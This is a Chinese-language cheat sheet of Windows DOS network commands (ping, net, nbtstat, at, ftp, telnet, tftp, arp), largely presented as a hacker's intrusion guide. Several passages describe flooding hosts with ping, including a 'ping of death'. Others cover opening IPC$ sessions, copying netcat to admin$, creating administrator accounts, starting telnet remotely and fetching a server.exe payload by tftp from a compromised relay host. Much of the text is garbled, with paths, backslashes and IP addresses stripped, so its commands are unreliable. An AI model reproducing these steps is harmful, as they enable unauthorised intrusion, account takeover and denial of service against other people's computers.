DOS网络指令.doc

一，ping它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车，。所示的帮助画面。-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如ping IP -t -n 3，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。二，nbtstat该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。-n 列出本地机器的NETBIOS信息。当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。三，netstat这是一个用来查看网络状态的命令，操作简便功能强大。-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息，如图4。这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。四，tracert跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。如图5。这里说明数据从本地机器传输到的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。五，net这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?回车。在这里，我们重点掌握几个入侵常用的子命令。net view使用此命令查看远程主机的所以共享资源。命令格式为net view IP。net use把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: IPsharename。上面一个表示把5 IP的共享名为magic的目录影射为本地的Z盘。下面表示和7建立IPC$连接（net use IPIPC$ password /user:name），建立了IPC$连接后，呵呵，就可以上传文件了：copy nc.exe admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。net start使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，如图9，成功启动了telnet服务。net stop入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。net user查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。2，net user abcd /del，将用户名为abcd的用户删除。3，net user abcd /active:no，将用户名为abcd的用户禁用。4，net user abcd /active:yes，激活用户名为abcd的用户。5，net user abcd，查看用户名为abcd的用户的情况六，at这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command computer。表示在6点55分时，让名称为a-01的计算机开启telnet服务（这里net start telnet即为开启telnet服务的命令）。七，ftp大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入help来查看帮助（任何DOS命令都可以使用此方法查看其帮助)。大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入open 主机IP ftp端口回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例介绍。用户名和密码都是ftp，密码是不显示的。当提示* logged in时，就说明登陆成功。这里因为是匿名登陆，所以用户显示为Anonymous。接下来就要介绍具体命令的使用方法了。dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。cd 进入某个文件夹。get 下载文件到本地机器。put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么 利用就不多说了，大家就自由发挥去吧。delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。bye 退出当前连接。quit 同上。八，telnet功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息。然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。九 NSLOOKUPNSLOOKUP是NT、2000中连接DNS服务器，查询域名信息的一个非常有用的命令，简单介绍如下： 实例：查询163.com域名信息 D:nslookup Default Server: Address: 当前的DNS服务器 ,可用server命令改变。 设置查选条件为所有类型记录（A、MX等） 查询域名，注意有. Server: Address: 十 iisapp先来看看iisapp的一些参数iisapp -a pid可以查出对应的域名反之 iisapp -p domain 查pid的语法iisapp a/AppPoolName | /pAppPoolID参数/a AppPoolName指定特定应用程序池的名称。（可选项）/p AppPoolID按 ID 号指定应用程序池。（可选项）注释如果未指定应用程序池名或 ID，则 iisapp 列出所有运行应用程序。仅当使用 /s 时，才可使用 /u 和 /p 命令行选项。必须同时使用 /p 和 /u 才能提供用户密码。Iisext.vbs 执行 IIS 管理器中可用的相同操作。可使用任何一种工具管理 IIS 网站。点击运行输入CMD输入iisapp -a很奇怪,这里显示PID的,是用弹出窗口一个个出现的,不知道别人会不,反正我就是这样,太不利于查看了!注意,希望人BLOG听说第一次运行,会提示没有js支持,点击确定.然后再次运行就可以了.这样就可以看到pid对应的应用程序池,这个我就没测试了!这样吧,先再CMD里面输入:cd %systemroot%system32然后再输入:cscrIPt.exe iisapp.vbs -aCMD窗口显示如下:W3WP.exe PID: 2558 AppPoolId: zzecW3WP.exe PID: 6444 AppPoolId: zzec再任务管理器里面查看占用CPU和内存过高进程的PID值,就知道是哪一个应用程序池出了问题,就可以查到具体是什么网站有问题了DOS网络命令大全 net use ipipc$ /user: 建立IPC空链接 net use ipipc$ 密码 /user:用户名 建立IPC非空链接 net use h: ipc$ 密码 /user:用户名 直接登陆后映射对方C：到本地为: net use h: ipc$ 登陆后映射对方C：到本地为: net use ipipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup *istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：*istrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time 目标ip 查看对方时间 net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip 文本信息 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C：共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l空格数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 #2 二： del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） move 盘符路径要移动的文件名存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中， 和 是重定向命令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP（属telnet登陆后的命令） telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径文件名1路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 copy c:srv.exe ip*$ 复制本地c:srv.exe到对方的*下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 copy ip*$svv.exe c: 或:copyip*$*.* 复制对方*i$共享下的srv.exe文件（所有文件）至本地C： xcopy 要复制的文件或目录树目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 tftp -i 对方IPput c:server.exe 登陆后，上传本地c:server.exe至主机DOS下常用网络命令解释大全我们经常看到网络高手使用DOS命令测试网络，DOS网络命令能解决很多网络问题。本教程教大家认识一下常见的DOS网络：ARP、Finger、Nbtstat命令。Arp显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP协议之后才可用。arp -a inet_addr -N if_addrarp -d inet_addr if_addrarp -s inet_addr ether_addr if_addr参数-a通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr，则只显示指定计算机的 IP 和物理地址。-g与 -a 相同。inet_addr以加点的十进制标记指定 IP 地址。-N显示由 if_addr 指定的网络界面 ARP 项。if_addr指定需要修改其地址转换表接口的 IP 地址（如果有的话）。如果不存在，将使用第一个可适用的接口。-d删除由 inet_addr 指定的项。-s在 ARP 缓存中添加项，将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的6个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的，即在超时到期后项自动从缓存删除。ether_addr指定物理地址。Finger在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP协议之后才可用。finger -l usercomputer.参数-l以长列表格式显示信息。user指定要获得相关信息的用户。省略用户参数以显示指定计算机